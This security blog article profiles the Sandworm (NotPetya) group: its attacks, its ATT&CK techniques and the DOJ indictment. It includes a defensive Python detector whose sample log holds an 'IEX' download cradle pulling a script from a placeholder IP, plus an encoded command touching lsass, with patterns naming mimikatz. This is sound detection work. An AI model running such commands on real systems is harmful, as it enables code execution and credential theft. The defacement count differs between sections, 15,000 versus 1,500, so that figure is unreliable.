Malware analysis

APT Sandworm (NotPetya) technical overview

April 7, 2021, by Pedro Tavares

Sandworm, also known as Telebots, is one of the most dangerous Russian threat actors targeting industrial control systems. The group uses a toolkit called BlackEnergy and is associated with attacks on electricity generation and distribution for espionage, denial of service and data destruction. It is attributed to Russia’s Main Intelligence Directorate (GRU) and has conducted attacks against thousands of U.S. and international corporations, organizations, political campaigns and governments.

Across the world, Sandworm has adopted new tactics, techniques and procedures (TTPs) to take advantage of a target’s weaknesses. The group has been active since 2009, and some researchers suggest it was also involved in the attacks against Georgia in 2008.

Timeline of Sandworm cyberattacks

The attacks carried out in Sandworm’s campaigns are often destructive; the most notable are listed below:

  • In December 2015 and December 2016, the Sandworm group executed cyberattacks against companies that support electric infrastructure, disrupting the supply of electricity to more than 225,000 Ukrainian customers.
  • In 2017, Sandworm ran spearphishing waves that targeted local government, political parties and campaigns in France, including Emmanuel Macron’s presidential campaign.
  • In 2017, a notable malware campaign, NotPetya, was launched, causing hundreds of victim organizations worldwide to lose $1 billion collectively. Petya and NotPetya are different malware variants: they use different encryption keys and have distinct reboot behavior, displays and ransom notes. Both, however, are equally destructive.
  • Sandworm launched attacks against the 2018 Winter Olympics after a Russian government-sponsored doping effort led to Russian athletes being barred from competing under the Russian flag.
  • In October 2019, Sandworm defaced approximately 15,000 websites in Georgia.
  • More recently, in 2020, Sandworm exploited a critical Exim flaw (CVE-2019-10149) to compromise Exim mail servers. According to the NSA, “The actors exploited victims using Exim software on their public-facing MTAs by sending a command in the ‘MAIL FROM’ field of an SMTP (simple mail transfer protocol) message.”

Overview of the Sandworm TTPs

The threat group has used several techniques to compromise a large volume of targets in recent years. In this section, we will focus on the main TTPs used by the Sandworm group, divided into several groups according to the MITRE ATT&CK mapping.

T1566: Phishing

Spearphishing campaigns were used by the Sandworm group to gain access to computers or account credentials. The emails were specially crafted to appear familiar and trustworthy. The threat group developed and tested its spearphishing techniques before launching campaigns, to increase their chances of success.

Source: https://attack.mitre.org/techniques/T1566/


T1059: Command and scripting interpreter

The threat group used PowerShell commands and specially crafted scripts to discover system information, execute code or download malware. According to some researchers, “In one instance, the group executed a malicious PowerShell script that contained versions of a credential harvesting tool. The tool operated only in memory and was not easily detectable by antivirus software.”

Source: https://attack.mitre.org/techniques/T1059/
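The passage above notes that the in-memory PowerShell tooling was hard for antivirus to see on disk, which is why defenders lean on PowerShell script block logging instead. The script below is an added example for this article (not code from the original post or from any of the cited sources): it scans constructed script-block log lines for generic in-memory execution indicators (download cradles, Invoke-Expression, reflective assembly loading, references to credential tooling), unwraps -EncodedCommand payloads before scanning so that base64 encoding does not hide an indicator, and maps each hit to the technique IDs discussed on this page (T1059, T1003). The log layout, host names, users, IP address and script contents are all constructed for illustration; the regexes are heuristics chosen here, not vendor or Sandworm-specific signatures.

```python
"""Score PowerShell script-block log lines for in-memory execution and credential-access
indicators, and map each hit to the ATT&CK technique it evidences.

Added example: the log format, hosts, users and script contents below are constructed
for illustration and are not taken from any real incident.
"""
import base64
import re
from dataclasses import dataclass, field

# Heuristic patterns chosen for this example (generic PowerShell tradecraft, not
# Sandworm-specific signatures), each paired with the ATT&CK technique it evidences.
INDICATORS = [
    ("download_cradle", re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadString|DownloadFile", re.I), "T1059"),
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), "T1059"),
    ("reflective_load", re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I), "T1059"),
    ("credential_access", re.compile(r"mimikatz|lsass", re.I), "T1003"),
]

# -EncodedCommand / -enc / -e followed by a base64 blob (PowerShell expects UTF-16LE inside).
ENCODED_RE = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed log line layout: "<timestamp> host=<host> user=<user> script=<script block>".
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+script=(?P<script>.*)$")


@dataclass
class Finding:
    host: str
    user: str
    decoded: bool = False                      # True when an encoded payload was unwrapped
    indicators: list = field(default_factory=list)
    techniques: set = field(default_factory=set)


def decode_encoded_commands(script):
    """Return the plaintext of every -EncodedCommand payload found in the script block."""
    decoded = []
    for m in ENCODED_RE.finditer(script):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):   # not valid base64 / not UTF-16LE: skip it
            continue
    return decoded


def analyze_line(line):
    """Parse one log line; return a Finding if any indicator matched, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    script = m.group("script")
    payloads = decode_encoded_commands(script)
    # Scan the script with the base64 blob masked, plus the decoded payloads, so that
    # encoding neither hides an indicator nor causes chance matches inside the base64 text.
    surface = ENCODED_RE.sub("-enc <decoded>", script) + "\n" + "\n".join(payloads)
    finding = Finding(m.group("host"), m.group("user"), decoded=bool(payloads))
    for name, pattern, technique in INDICATORS:
        if pattern.search(surface):
            finding.indicators.append(name)
            finding.techniques.add(technique)
    return finding if finding.indicators else None


def analyze_log(lines):
    """Run analyze_line over a log and keep only the lines that produced a Finding."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


# Constructed sample log: one benign line, one plaintext download cradle, one encoded command.
_ENCODED = base64.b64encode(
    "[Reflection.Assembly]::Load($b); $p = Get-Process lsass".encode("utf-16-le")
).decode("ascii")

SAMPLE_LOG = [
    "2021-04-07T10:12:31Z host=ws01 user=CORP\\jdoe script=Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "2021-04-07T10:14:02Z host=ws01 user=CORP\\jdoe script=IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')",
    "2021-04-07T10:15:40Z host=srv02 user=CORP\\svc_backup script=powershell.exe -NoP -enc " + _ENCODED,
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f.host} {f.user} decoded={f.decoded} {sorted(f.techniques)} {f.indicators}")
```

Run as-is it reports the second and third sample lines and ignores the benign one; the third line is only caught because the encoded payload is unwrapped first, which is the practical lesson: a script-block rule that matches the raw text alone misses the simplest encoding. In a real deployment the same logic would sit on top of Windows event 4104 (script block logging), which must be enabled by policy before any of this telemetry exists.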


T1078: Valid accounts

Sandworm used legitimate existing accounts to maintain its foothold in the infrastructure. The group also deployed malware and used hacking tools to keep control over networks and victims’ devices. This technique was also used to exfiltrate data, including confidential documents, tools and more.

Source: https://attack.mitre.org/techniques/T1078/


T1070: Indicator removal on host

Sandworm used an algorithm to obfuscate particular features of the Olympic Destroyer malware to obstruct attack investigations and avoid detection.

Source: https://attack.mitre.org/techniques/T1070/


T1036: Masquerading

Sandworm tried to masquerade their activity through researching and emulating malware used by the Lazarus Group.

Source: https://attack.mitre.org/techniques/T1036/


T1003: OS credential dumping

Sandworm often dumped credentials to obtain account login and credential details from compromised machines.

Source: https://attack.mitre.org/techniques/T1003/


T1083: File and directory discovery

Sandworm accessed and browsed files, ran malicious scripts and searched compromised machines for credential files and files containing network configuration details.

Source: https://attack.mitre.org/techniques/T1083/


T1210: Exploitation of remote services

Sandworm exploited remote services to reach internal systems. Once access was obtained, the group deployed malware that was used to gain system privileges and to execute or implant further stages.

Source: https://attack.mitre.org/techniques/T1210/


T1491: Defacement

Sandworm defaced approximately 1,500 websites, and disrupted service to some of them, after compromising a Georgian web hosting provider.

Source: https://attack.mitre.org/techniques/T1491/


T1490: Inhibit system recovery

The group deployed destructive malware that deleted files from hard drives, forced shutdowns and impeded rebooting and recovery by misconfiguring BitLocker, rendering computers inoperable.

Source: https://attack.mitre.org/techniques/T1490/

DOJ charges six Sandworm APT members

After years of investigation into Sandworm, the DOJ charged six Russian nationals for their alleged roles in the NotPetya, Ukraine power grid and Olympics cyberattacks, in an announcement published in October 2020. The six defendants are listed below.


The threat group is responsible for several high-profile cyberattacks over the past few years, including the destructive NotPetya attack that hit hundreds of firms and hospitals worldwide.

Each defendant is charged with specific malicious acts, as described in the official publication and summarized in the table above. The defendants and their co-conspirators caused extensive damage and disruption to computer networks worldwide, including in France, Georgia, the Netherlands, the Republic of Korea, Ukraine, the United Kingdom and the United States.


Hooking Sandworm

This ongoing investigation is seen as an important step toward defeating the group. Several threat researchers applauded the DOJ crackdown and said that the indictment, and any arrest and extradition of the six Russian nationals, could limit their ability to use the Western financial system or to travel to any country with an extradition agreement with the U.S.

Google’s Threat Analysis Group (TAG), Cisco’s Talos Intelligence Group, Facebook and Twitter were also credited with assisting the DOJ in this investigation. Information sharing was crucial to identifying the defendants and attributing their devastating attacks, including the NotPetya incident that affected many Internet users and organizations around the world.


Sources

Exim flaw, NSA

Russian APTs, IronNet

Sandworm analysis, Digital Shadows

DOJ charges six Sandworm APT members, DOJ

Pedro Tavares

Pedro Tavares is an information security professional working as an Ethical Hacker, Malware Analyst and Security Evangelist. He is also Editor-in-Chief of the computer security blog seguranca-informatica.pt.

In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics, such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and security in computer networks. He is also a Freelance Writer.